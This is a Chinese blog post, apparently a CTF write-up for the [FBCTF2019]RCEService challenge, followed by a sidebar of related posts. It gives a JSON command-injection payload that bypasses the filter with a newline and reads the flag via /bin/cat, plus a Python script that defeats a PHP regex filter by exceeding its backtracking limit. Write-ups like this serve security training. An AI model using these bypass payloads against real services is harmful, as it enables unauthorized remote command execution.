[FBCTF2019]RCEService1

最新推荐文章于 2024-08-17 16:48:31 发布
最新推荐文章于 2024-08-17 16:48:31 发布
阅读量226 收藏
点赞数 2
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kw741951/article/details/141200854
版权

打开题目

它给出了提示要求json格式,先尝试一下{"cmd":"ls"} 

的确可以执行。接下来就记录过滤了那些关键字。发现键盘上有的特殊符号好像都被过滤。

flag在home目录下,不知道为什么find命令返回为空。。。

cat在这里仍然不能用。应该是环境变量配置被改变,所以需要使用/bin/cat调用命令

{%0a"cmd":"/bin/cat%20/home/rceservice/flag"%0A}

利用回溯次数绕过 ,post请求

gei请求会因为头太大而报错

代码:

import requests
 
payload = '{"cmd":"/bin/cat /home/rceservice/flag ","nayi":"' + "a"*(1000000) + '"}' #超过一百万,这里写一千万不会出结果。
 
res = requests.post("ip", data={"cmd":payload})
print(res.text)

python里面运行出结果

worker..
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
虚拟机搭建FBCTF平台,汉化版FBCTF-附件资源
03-05
虚拟机搭建FBCTF平台,汉化版FBCTF-附件资源
NetScream(网络加速软件) v1.8.4.2014 官方正式版.zip
07-15
NetScream是一款优化你的modem连接速率的工具。NetScream能提高你的internet连接速度,NetScream官方正式版是目前市场上最佳的modem优化工具之一,能极好地提高你的modem的下载/上传速度。它非常易于使用,完全兼容...
[FBCTF2019]RCEService 1
plant1234的博客
09-30 753
首先打开题目根据测试发现用JSON格式可以命令执行:发现有正则匹配绕过。
[FBCTF2019]RCEService
shinygod的博客
04-10 756
知识点:json格式,GET传参上限,换行绕preg,超回溯上限绕preg 开头给了个框让我们输入json格式。 输入{“cmd”:“ls”}注意:json格式用双引号包裹起来 但cat的时候就报错了,{“cmd”:“cat index.php”},像其他tac,nl…都不行。 看了其他人的wp,这个虚空源码很迷,不知道咋过来的。 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $
BUU [FBCTF2019]RCEService
Jay17的博客
03-13 546
BUU [FBCTF2019]RCEService
BUUCTF-[FBCTF2019]RCEService&[0CTF 2016]piapiapia
weixin_44016181的博客
10-11 218
BUUCTF-[FBCTF2019]RCEService&[0CTF 2016]piapiapia,BUU两道web练习题的WP。
[FBCTF2019]RCEService_WP
Accompany的博客
01-30 318
分析 文章目录分析源码题解 Enter command as JSON: 这便是打开页面的提示了,需要提交命令以JSON的形式,所以在这里先了解一下JSON是什么 了解于此 简单来说形式如下:{名称:值} 检验成功,下来便是通过命令执行获取flag了 接着其实是想cat源码看一看,毕竟一个RCE肯定会有许多过滤,但不管怎样cat,以见过的绕过方式去尝试都是没有回显的,便去看了各位师傅的wp,都说是网上搜的源码,咱也不明白咋来的,就直接奉上吧 源码 <?php putenv('PATH=/ho
BUUCTF:[FBCTF2019]RCEService
../../../../../../../
06-23 666
打开界面 可以看见提示说要用JSON格式输入cmd中 先尝试一下 {"cmd":"ls"} 出现一个index.php文件 但是获取不到,题目也没有其他信息,然后发现原本题目是提供了源码的,去网上找了找 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacki
图片滚动加载
07-12
1. **数据属性**:为图片元素添加一个数据属性,如"data-src",存储原始图片URL。 2. **滚动事件**:监听滚动事件,当图片进入视口时,获取该图片元素并更新它的`src`属性。 3. **性能优化**:为了避免频繁触发滚动...
feedblitz汉化操作平台
07-22
1. **邮件订阅管理**:用户可以通过Feedblitz创建订阅表单,嵌入到自己的网站或博客中,让访客可以轻松订阅更新。它还支持管理订阅者列表,包括验证电子邮件地址、处理退订请求等。 2. **RSS Feed自动发送**:当...
Linux 定时任务
flash的博客
08-14 363
Linux系统中,cron是一个广泛使用的定时任务工具,允许用户安排周期性执行的任务(脚本或命令)。cron守护进程(crond)会读取配置文件(通常位于/etc/crontab),并根据这些配置文件中指定的时间规则来执行相应的任务。
linux开启RNDIS,实现虚拟网卡
轩辕霸天L
08-15 426
首先要 `make clean`,清空之前的编译结果。
linux HBA驱动中scsi_host_template .shost_attrs
Wang20122013的博客
08-13 499
scsi_host_template是一个结构体,用于定义SCSI主机(host adapter)的属性和操作。这个模板用于初始化SCSI主机结构体scsi_host_template,它包含了主机的属性、操作函数等。shost_attrs是scsi_host_template结构体中的一个成员,它是一个属性组,用于定义SCSI主机可以支持的属性。每个属性都会有相应的操作函数,这些函数定义了如何读取或写入属性值。例如,一个属性可能有一个show函数来返回当前值,一个store函数来设置新值。
Linux Xfce 桌面环境系统休眠的问题
最新发布
Wynter
08-17 237
通过这些步骤,你应该能够解决 Xfce 桌面环境中的系统休眠问题。如果问题仍然存在,可能需要进一步检查硬件兼容性或寻求更专业的技术支持。确保你的硬件驱动程序正确支持电源管理功能。特别是对于笔记本电脑,显卡和电池驱动程序的兼容性非常重要。确保你的系统上运行着正确的电源管理守护进程。在大多数现代 Linux 发行版中,这通常是。查看系统日志可能会提供一些关于为什么系统进入休眠状态的线索。如果你暂时不需要系统休眠功能,可以禁用它。
Linux Mqtt客户端编程
laocui1的博客
08-16 142
Mqtt客户端
Linux】文件系统
2301_77438812的博客
08-17 377
文件系统
Linux中线程接口(分离,查看id)mv指令
2301_77479435的博客
08-14 837
Linux中线程接口(分离,查看id)mv指令
Linux设置yum源为阿里云镜像源
小诸葛的博客
08-17 80
如果ping不通,则找一台可以连接外网的电脑,ping一下mirrors.aliyun.com,找到mirrors.aliyun.com对应的ip。五、查看yum源信息,已经更换为了阿里云镜像源。三、下载阿里云Centos-7.repo文件。一、验证网络是否可以连接阿里云镜像。
开源的CTF比赛平台有那些
03-25
1. CTFd (https://github.com/CTFd/CTFd) 2. PicoCTF platform (https://github.com/picoCTF/picoCTF-platform) 3. FBCTF (https://github.com/facebook/fbctf) 4. RootTheBox (https://github.com/moloch--/RootTheBox) 5. HackTheBox platform (https://github.com/HackTheBox/htb-frontend) 6. Metasploitable 3 CTF platform (https://github.com/rapid7/metasploitable3_ctf) 7. Securinets CTF platform (https://github.com/Securinets/Securinets-CTF-Platform) 8. Vagrant CTF (https://github.com/fiteagle/vagrant-ctf) 9. CyberChef CTF platform (https://github.com/TobiasSchoch/cyberchef-ctf) 10. Hackazon (https://github.com/rapid7/hackazon)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值